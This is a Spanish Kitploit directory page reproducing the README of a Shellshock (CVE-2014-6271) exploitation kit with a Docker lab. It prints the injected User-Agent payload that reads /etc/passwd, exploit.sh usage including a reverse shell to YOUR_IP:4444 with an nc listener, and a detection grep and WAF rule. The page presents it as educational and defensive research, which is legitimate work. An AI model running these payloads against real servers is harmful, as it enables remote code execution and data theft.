Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
bash-apocalypse — Recreando Shellshock (CVE-2014-6271) - la vulnerabilidad de bash que puso en peligro millones de servidores. Kit de explotación automatizada + metodología de Burp Suite + laboratorio Docker. Construido para investigación y educación en seguridad. Proyecto de portafolio de seguridad ofensiva. | Kitploit
Herramientas/GitHubGitHub/mtaha-sec/bash-apocalypse
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónEvasión de IDS/IPSShellcodeExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlMala ConfiguraciónAprendizaje y EducaciónLabs y Práctica
hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHub
mtaha-sec/bash-apocalypse

bash-apocalypse

Ver Repositorio

Acerca de

Recreando Shellshock (CVE-2014-6271) - la vulnerabilidad de bash que puso en peligro millones de servidores. Kit de explotación automatizada + metodología de Burp Suite + laboratorio Docker. Construido para investigación y educación en seguridad. Proyecto de portafolio de seguridad ofensiva.

Compartir

Bash Apocalypse

Kit de explotación automatizada para CVE-2014-6271 (Shellshock)

Severity CVSS Score

Un proyecto completo de investigación en seguridad que demuestra la vulnerabilidad Shellshock que afectó a millones de servidores en 2014. Incluye capacidades de escaneo automatizado, explotación y recomendaciones defensivas.

Demo


¿Qué es Shellshock?

Shellshock (CVE-2014-6271) es una vulnerabilidad crítica en el shell Bash que permite la ejecución remota de código mediante la manipulación de variables de entorno. Descubierta en 2014 tras haber existido durante 22 años, afectó a millones de sistemas Unix/Linux en todo el mundo.

Cómo funciona:

root@kitploit:~
# Normal: Bash exporta funciones como variables de entorno
my_function='() { echo "hello"; }'

# El error: Bash continúa analizando después de la definición de la función
exploit='() { :;}; echo "PWNED"'  # El segundo comando se ejecuta

Los servidores web que usan CGI pasan los encabezados HTTP como variables de entorno a Bash, lo que los hace vulnerables:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

Inicio rápido

root@kitploit:~
# Clonar y configurar
git clone https://github.com/YOUR-USERNAME/bash-apocalypse.git
cd bash-apocalypse

# Iniciar laboratorio vulnerable
docker-compose up -d

# Ejecutar exploit
chmod +x exploit.sh
./exploit.sh --url http://localhost:8080/cgi-bin/test.cgi --cmd "whoami"

Características

Escáner automatizado

  • Descubre endpoints CGI vulnerables
  • Prueba múltiples puntos de inyección (User-Agent, Referer, Cookie)
  • Soporte para listas de palabras personalizadas

Herramienta de explotación

  • Ejecución de comandos con captura de salida
  • Shell inversa automatizada
  • Múltiples opciones de payload

Entorno de laboratorio

  • Configuración Docker con un solo comando
  • Servidor vulnerable aislado
  • Entorno de pruebas seguro

Uso

Escanear vulnerabilidades

root@kitploit:~
./exploit.sh --scan --target localhost --port 8080

Ejecutar comandos

root@kitploit:~
./exploit.sh --url http://target/cgi-bin/test.cgi --cmd "id"

Obtener shell inversa

root@kitploit:~
# Terminal 1
nc -lvnp 4444

# Terminal 2
./exploit.sh --url http://target/cgi-bin/test.cgi --reverse-shell YOUR_IP:4444

Explotación manual (Burp Suite)

Paso 1: Interceptar solicitud

Interceptar en Burp

Paso 2: Inyectar payload

Explotación

Modificar el encabezado User-Agent:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

Paso 3: Observar respuesta

Shell inversa

El servidor ejecuta tu comando y devuelve la salida.


Análisis técnico

Flujo del ataque

root@kitploit:~
Cliente (Atacante)
    │
    │ Solicitud HTTP con User-Agent malicioso
    ▼
Servidor Web
    │
    │ Pasa el encabezado como variable de entorno
    ▼
Script CGI
    │
    │ Inicia un proceso Bash
    ▼
Shell Bash
    │
    │ Analiza la función y ejecuta comandos posteriores
    ▼
Ejecución de comandos (RCE)

Causa raíz

Cuando Bash encuentra una definición de función en una variable de entorno:

  1. Analiza la función: () { :;}
  2. Error: Continúa analizando y ejecuta cualquier cosa después
  3. Resultado: Ejecución arbitraria de comandos

Defensa

Mitigación inmediata

root@kitploit:~
# Actualizar Bash
sudo apt-get update && sudo apt-get upgrade bash

# Deshabilitar CGI si no es necesario
sudo a2dismod cgi && sudo systemctl restart apache2

Detección

root@kitploit:~
# Revisar logs en busca de intentos de explotación
grep -E "\\(\\)|\\{.*\\}" /var/log/apache2/access.log

Regla WAF

root@kitploit:~
SecRule REQUEST_HEADERS "\\(\\).*\\{" "deny,status:403,msg:'Ataque Shellshock'"

Habilidades demostradas

  • Pruebas de penetración en aplicaciones web
  • Scripting y automatización en Bash
  • Manipulación del protocolo HTTP
  • Contenedores Docker
  • Uso de Burp Suite
  • Seguridad ofensiva y defensiva

Estructura del proyecto

root@kitploit:~
bash-apocalypse/
├── README.md
├── exploit.sh              # Herramienta principal
├── payloads.txt            # Payloads de prueba
├── docker-compose.yml      # Configuración del laboratorio
└── screenshots/
    ├── intercept.png
    ├── Payload.png
    └── result.png

Aviso legal

Solo con fines educativos. Prueba únicamente sistemas que te pertenezcan o para los que tengas permiso explícito. El acceso no autorizado es ilegal.


Recursos

  • Detalles de CVE-2014-6271
  • Cloudflare: Inside Shellshock
  • Práctica: HackTheBox - Shocker

Construido para entender cómo funcionan las vulnerabilidades y cómo defenderse de ellas. ;)

Descargar herramienta